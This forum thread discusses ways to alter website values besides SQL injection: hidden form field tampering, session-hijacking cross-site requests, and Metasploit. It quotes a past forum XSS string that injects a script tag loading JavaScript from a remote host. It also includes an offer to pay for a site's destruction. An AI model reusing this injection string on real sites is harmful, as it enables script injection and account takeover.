Changing values besides SQL Injection

[frosty]

I know that SQL Injection is a good way to hack into a server and change what you want, steal what you want, or even crash the database, but I remember reading a thread on Mozilla forums where the posters agreed in conclusion that there are other methods, besides SQL injection, that you can change certain values hidden from the average users. Considering, they said, that certain values such as post count, join date, etc are simply accepted number values in a system, with the right methods the user could change such values to their liking.

Now, this is not about my account here, because I'm fine with everything, but I'm just wondering, are they right that there is a way besides SQL injection? Because that would mean that hacking in some cases is not required for someone to change certain hidden values they want changed. And would it even be legal to do so anyways? Editing the source code only changes things on your end for a short time.

[Plu]

It all depends on how the website is set up. If your server accepts a form that includes the post count, which is a 'hidden' field and you rely on the user to properly update it, then he can simply post a different value and change it like that. It's perfectly legal to do so, and dumb on the side of the programmer to use that approach.

It's also possible to use cross-site hacks that post a form as another user by hijacking their user session. That's not legal, but if a site is vulnerable to it and you get such a script to run on the machine of an admin, you could change just about anything because the server will interpret the requests as coming from the admin.

Of course both of these can be blocked off with good software design.

EDIT: and of course there are many more options, depending on the setup of the site. But all of them rely on the programmer making a mistake somewhere.

[bericks999]

Take a look at the Metasploit tool to learn exactly what you are asking about.  It's an open source penetration testing framework therefore entirely free to download and use.

You are not allowed to view links. Register or Login

[Sal1981]

Unescape, unescape, unescape.

Data sanitation is very important in online forms, especially forum posts.

For instance, on RuneScape's official forums there was an oversight of the quote button, where you could hide JavaScript as regular text by just typing:

Code: You are not allowed to view links. Register or Login

',0);followed by any inline tag, even something as

Code: You are not allowed to view links. Register or Login

',0);<script src='remotesite/malicious_code.js'></script>would load whatever would be on the remote js on the browsers client. What really annoyed me in this particular case is that JaGeX took a whole 2 weeks to patch this, even though loads of people knew on it on the HLF section of the forums. I even saw throw-away accounts post tiny fontsized text with this text with links to external script files hidden among regular text, hoping people would click on the quote button. It is patched now, at last.

[Jason78]

Now, this is not about my account here, because I'm fine with everything, but I'm just wondering, are they right that there is a way besides SQL injection?

Yes.  Yes there is.  It's still compromising a computer system though, and still technically illegal.

[bericks999]

Now, this is not about my account here, because I'm fine with everything, but I'm just wondering, are they right that there is a way besides SQL injection?

Yes.  Yes there is.  It's still compromising a computer system though, and still technically illegal.

That's not true as I've legally compromised many systems as part of a penetration testing team.

[Plu]

I also doubt the defense "but they're not allowed" will hold if your machine openly accepts any value for a variable.

[aitm]

If anybody wants some practice hacking I have a site that I would pay a couple hundred to get hacked/fucked up/destroyed etc.......PM me.

[Jason78]

Now, this is not about my account here, because I'm fine with everything, but I'm just wondering, are they right that there is a way besides SQL injection?

Yes.  Yes there is.  It's still compromising a computer system though, and still technically illegal.

That's not true as I've legally compromised many systems as part of a penetration testing team.

Yeah, but I'm guessing that Frosty doesn't own the site he's thinking of hacking.

[frosty]

If anybody wants some practice hacking I have a site that I would pay a couple hundred to get hacked/fucked up/destroyed etc.......PM me.

I remember a guy that did that for fun, he was so skilled at this type of stuff it was amazing. But unfortunately he was as elusive as he was good at hacking, and he disappeared as far as I'm concerned. He probably would have been the best person for that type of job.

Yeah, but I'm guessing that Frosty doesn't own the site he's thinking of hacking.

Oh wow Jason I was curious, I did not want to make an account on Mozilla forums so I thought I would ask here.